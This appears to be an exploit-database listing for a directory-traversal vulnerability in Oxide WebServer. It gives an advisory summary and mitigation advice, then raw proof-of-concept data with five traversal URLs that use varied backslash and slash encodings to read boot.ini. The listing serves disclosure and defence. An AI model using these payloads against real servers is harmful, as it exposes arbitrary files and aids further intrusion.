header-logo
Suggest Exploit
vendor:
Oxide WebServer
by:
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Oxide WebServer
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Oxide WebServer Directory Traversal Vulnerability

The Oxide WebServer is vulnerable to a directory-traversal attack due to insufficient sanitization of user-supplied input in its web interface. An attacker can exploit this vulnerability to view arbitrary files on the webserver, potentially aiding in further attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input properly and validate file access permissions on the web server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/50845/info

Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks. 

http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini

Navigation

Suggest Exploit

Services By CQR